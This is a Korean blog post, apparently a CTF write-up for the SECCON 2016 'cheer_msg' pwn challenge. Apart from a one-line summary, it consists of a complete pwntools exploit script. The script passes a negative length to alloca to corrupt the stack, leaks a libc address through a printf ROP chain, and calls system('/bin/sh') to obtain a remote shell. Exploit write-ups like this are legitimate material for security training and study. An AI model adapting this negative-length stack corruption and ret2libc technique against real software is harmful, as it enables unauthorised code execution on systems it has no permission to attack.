SECCON 2016 cheer_msg

Games/CTF 2016. 12. 12. 20:22

요약: alloca 에 음수줘서 stack 해꼬질함.

summary: negative index to alloca() and fuckup the stack.



from pwn import *

context.arch = 'i386' # i386 / arm


# recvuntil sendline, pack, recv, send

r = remote('cheermsg.pwn.seccon.jp', 30527)

#r = process(['./cheer_msg'])

raw_input('attach')

# start pwn.


print r.recvuntil('Message Length >> ')

r.sendline('-144')

print r.recvuntil('Name >> ')


# ROP start!

pr = 0x80487af

got = 0x804a00c

printf = 0x8048430

main = 0x80485ca

system = 0

binsh = 0


payload = ''

payload += pack(printf)

payload += pack(pr)

payload += pack(got)

payload += pack(main)

r.sendline(payload)


sleep(1)

leak = r.recv(8192)

print leak.encode('hex')

setbuf = int(leak.split(': \n')[1][:4][::-1].encode('hex'), 16)

print hex(setbuf)



raw_input('leak ok?')



system_offset = -0x27810    # server

#system_offset = -0x27800    # local

binsh_offset = +0xf8d2c     # server

#binsh_offset = +0xf9094     # local


# stage2.

#print r.recvuntil('Message Length >> ')

r.sendline('-144')

print r.recvuntil('Name >> ')


# ROP start!

system = setbuf + system_offset

binsh = setbuf + binsh_offset

payload = pack(system)

payload += pack(0)

payload += pack(binsh)

r.sendline(payload)


# get shell?

r.interactive()



'Games > CTF' 카테고리의 다른 글

DEFCON 2017 empanada writeup  (0) 2017.05.08
DEFCON 2017 awsno writeup  (0) 2017.05.08
SECCON 2016 cheer_msg  (0) 2016.12.12
SECCON 2016 checker  (0) 2016.12.12
SECCON 2016 logger  (0) 2016.12.11
SECCON 2016 jumper  (0) 2016.12.11
Posted by daehee87

댓글을 달아 주세요